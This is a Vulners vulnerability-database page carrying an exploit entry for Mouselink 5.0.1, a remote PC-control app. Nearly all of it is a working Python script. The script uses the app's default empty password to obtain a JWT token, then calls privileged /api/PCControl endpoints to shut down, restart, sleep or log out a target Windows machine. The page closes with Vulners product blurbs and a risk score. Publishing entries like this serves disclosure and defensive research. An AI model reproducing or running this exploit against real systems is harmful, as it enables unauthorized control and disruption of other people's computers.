Vulners
Lucene search
📄 Mouselink 5.0.1 Remote System Control
# Exploit Title: Mouselink 5.0.1 - Remote System Control
# Date: 25/06/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://mouselink.app/
# Software Link: https://blob.mouselink.app/mouselink-win-Setup.exe
# Version: 5.0.1
# Tested on: Windows 10
'''
Description:
Mouselink 5.0.1 allows remote attackers to control system functions
(shutdown, restart, sleep, logout). By default, no password is configured,
allowing an attacker to obtain a valid JWT token and invoke privileged
/api/PCControl/* endpoints, leading to unauthorized system operations.
'''
#!/usr/bin/env python3
import requests
import argparse
SERVER_IP = "192.168.8.105"
SERVER_PORT = 11521
BASE_URL = f"http://{SERVER_IP}:{SERVER_PORT}"
def login_and_get_token():
try:
response = requests.get(
f"{BASE_URL}/api/login",
params={"username": "blue0x1", "password": ""},
headers={
"User-Agent": "Dart/3.5 (dart:io)",
"Accept-Encoding": "gzip",
"Host": f"{SERVER_IP}:{SERVER_PORT}"
},
timeout=5
)
if response.status_code == 200 and response.json().get("success"):
return response.json()["data"]["key"]
except:
pass
return None
def send_pc_control_command(token, action):
endpoint = f"{BASE_URL}/api/PCControl/{action}"
headers = {"Authorization": f"Bearer {token}"}
try:
response = requests.get(endpoint, headers=headers)
data = response.json()
if data.get("success") == True:
print(f"[+] {action} request sent successfully.")
else:
print(f"[-] {action} failed.")
except:
print(f"[-] Error while sending {action} request.")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Mouselink Remote PC
Control Exploit")
parser.add_argument("--shutdown", action="store_true", help="Trigger
system shutdown")
parser.add_argument("--restart", action="store_true", help="Trigger
system restart")
parser.add_argument("--sleep", action="store_true", help="Put system to
sleep")
parser.add_argument("--logout", action="store_true", help="Log out
current user")
args = parser.parse_args()
token = login_and_get_token()
if not token:
print("[-] Failed to obtain JWT token.")
exit(1)
if args.shutdown:
send_pc_control_command(token, "Shutdown")
elif args.restart:
send_pc_control_command(token, "Restart")
elif args.sleep:
send_pc_control_command(token, "Sleep")
elif args.logout:
send_pc_control_command(token, "Logout")
else:
print("[-] No action specified. Use --shutdown, --restart, --sleep,
or --logout.")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Jun 2025 00:00Current
7.5High risk
Vulners AI Score7.5